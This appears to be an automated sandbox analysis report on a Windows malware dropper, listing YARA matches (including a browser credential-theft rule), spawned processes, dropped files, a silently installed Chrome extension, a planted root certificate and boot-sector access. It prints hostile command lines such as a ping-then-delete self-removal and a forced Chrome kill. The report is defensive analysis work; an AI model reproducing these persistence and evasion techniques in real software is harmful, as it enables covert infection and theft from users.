Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
Source: 00000015.00000002.831664649.00000000050E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000019.00000002.654114181.0000000004750000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.641295174.00000000046E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000015.00000002.829571542.00000000046C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.46c0000.7.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.aliens.exe.46e0000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.aliens.exe.10000000.6.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 25.2.1E1C360C582DF797.exe.4750000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.aliens.exe.46e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.46c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 25.2.1E1C360C582DF797.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 25.2.1E1C360C582DF797.exe.4750000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.10000000.11.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.5320000.10.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 21.2.1E1C360C582DF797.exe.4e60000.9.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 25.2.1E1C360C582DF797.exe.5230000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winEXE@31/50@223/4
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01216E5E GetLastError,FormatMessageW,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E621870 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_004024FB CoCreateInstance,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E6286A0 LoadResource,LockResource,SizeofResource,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeFile created: C:\Program Files (x86)\71eza90awf48Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\h1GodtbhC8.exe.logJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5724:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5364:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile created: C:\Users\user\AppData\Local\Temp\nsqEF28.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCommand line argument: sfxname
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCommand line argument: sfxstime
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCommand line argument: STARTDLG
Source: h1GodtbhC8.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\h1GodtbhC8.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\1607186572092.exeSystem information queried: HandleInformation
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: h1GodtbhC8.exeVirustotal: Detection: 46%
Source: h1GodtbhC8.exeMetadefender: Detection: 16%
Source: h1GodtbhC8.exeReversingLabs: Detection: 64%
Source: 1E1C360C582DF797.exeString found in binary or memory: -StartTP
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile read: C:\Users\user\Desktop\h1GodtbhC8.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\h1GodtbhC8.exe 'C:\Users\user\Desktop\h1GodtbhC8.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s
Source: unknownProcess created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 57A4014B45800FBE12583F3FC91E5DB8 C
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3
Source: unknownProcess created: C:\Users\user\AppData\Roaming\1607186572092.exe 'C:\Users\user\AppData\Roaming\1607186572092.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186572092.txt'
Source: unknownProcess created: C:\Users\user\AppData\Roaming\1607186588295.exe 'C:\Users\user\AppData\Roaming\1607186588295.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186588295.txt'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: C:\Users\user\AppData\Roaming\1607186572092.exe 'C:\Users\user\AppData\Roaming\1607186572092.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186572092.txt'
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: C:\Users\user\AppData\Roaming\1607186588295.exe 'C:\Users\user\AppData\Roaming\1607186588295.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186588295.txt'
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\h1GodtbhC8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Install
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: h1GodtbhC8.exeStatic file information: File size 4671378 > 1048576
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: h1GodtbhC8.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: setup.exe, 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1607186572092.exe, 0000001C.00000002.546755980.000000000040F000.00000002.00020000.sdmp, 1607186588295.exe, 0000001D.00000002.580846767.000000000040F000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibClr\obj\Release\SibClr.pdb source: h1GodtbhC8.exe, 00000000.00000003.367160882.0000000000745000.00000004.00000001.sdmp
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: 1E1C360C582DF797.exe, 00000015.00000002.826855048.00000000026F6000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb} source: h1GodtbhC8.exe, 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp, Sibuia.dll.0.dr
Source: Binary string: C:\Users\Lenny\Documents\nsis-3.01-src\build\urelease\stub_zlib-x86-ansi\stub_zlib.pdb source: aliens.exe, 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.825159947.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000019.00000000.617074635.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe.4.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000024.00000002.639458414.0000000000BDC000.00000002.00020000.sdmp
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb source: h1GodtbhC8.exe, 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp, Sibuia.dll.0.dr

Data Obfuscation:

barindex
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeUnpacked PE file: 25.2.1E1C360C582DF797.exe.4750000.5.unpack
Binary contains a suspicious time stampShow sources
Source: initial sampleStatic PE information: 0xBD323864 [Sat Aug 2 06:04:20 2070 UTC]
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeFile created: C:\Program Files (x86)\71eza90awf48\__tmp_rar_sfx_access_check_5371765Jump to behavior
Source: 1E1C360C582DF797.exe.4.drStatic PE information: real checksum: 0xe6954 should be:
Source: h1GodtbhC8.exeStatic PE information: real checksum: 0x0 should be: 0x47db98
Source: aliens.exe.1.drStatic PE information: real checksum: 0xe6954 should be:
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E65F9A8 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122E0E4 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122EBA6 push ecx; ret
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10010579 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026DF034 push E8026DF0h; iretd
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026E8680 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026E78B0 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026E78B0 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026E9FCF push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04E88D9A push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04E8EB91 push ecx; ret
Source: initial sampleStatic PE information: section name: .text entropy: 6.82101260035
Source: initial sampleStatic PE information: section name: .text entropy: 6.82101260035

Persistence and Installation Behavior:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Installs new ROOT certificatesShow sources
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD BlobJump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeFile created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeJump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\SibClr.dllJump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile created: C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dllJump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile created: C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dllJump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeFile created: C:\Program Files (x86)\71eza90awf48\aliens.exeJump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile created: C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeajeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\icon.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\icon48.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\popup.htmlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\background.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\book.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\jquery-1.8.3.min.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\popup.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\manifest.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04FABE50 _memset,SHGetSpecialFolderPathA,_strcat_s,PathFileExistsA,_memset,GetPrivateProfileStringA,_strlen,_strlen,PathRemoveFileSpecA,_strcat_s,_strcat_s,PathFileExistsA,PathFindFileNameA,

Boot Survival:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Windows\SysWOW64\msiexec.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
